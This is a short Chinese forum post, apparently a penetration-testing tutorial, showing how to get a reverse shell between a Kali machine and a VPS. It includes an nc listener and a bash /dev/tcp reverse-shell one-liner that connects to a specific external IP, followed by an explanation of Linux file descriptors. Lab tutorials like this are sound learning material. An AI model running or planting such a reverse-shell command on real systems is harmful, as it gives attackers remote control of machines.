admin 发表于 2018-7-27 11:21:46

linux渗透(一)

环境准备:

[*]kali linux 192.168.6.100
[*]centos7 (外网vps)
[*]花生壳 (用来端口映射)


开始
先在kali中执行命令

nc -lvp 5555

进行端口监听,需要注意的是此处端口为本地kali端口。


然后在外网vps上执行下面命令

bash -i >& /dev/tcp/103.46.128.49/25247 0>&1



回车后我们在kali中可以看到成功得到了shell
需要注意的是,这里的ip和端口为花生壳映射的端口的和ip



原理分析
linux文件描述符:linux shell下有三种标准的文件描述符,分别如下:

0 - stdin 代表标准输入,使用<或<<1 - stdout 代表标准输出,使用>或>>2 - stderr 代表标准错误输出,使用2>或2>>
还有就是>&这个符号的含义,最好的理解是这样的:

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符
页: [1]
查看完整版本: linux渗透(一)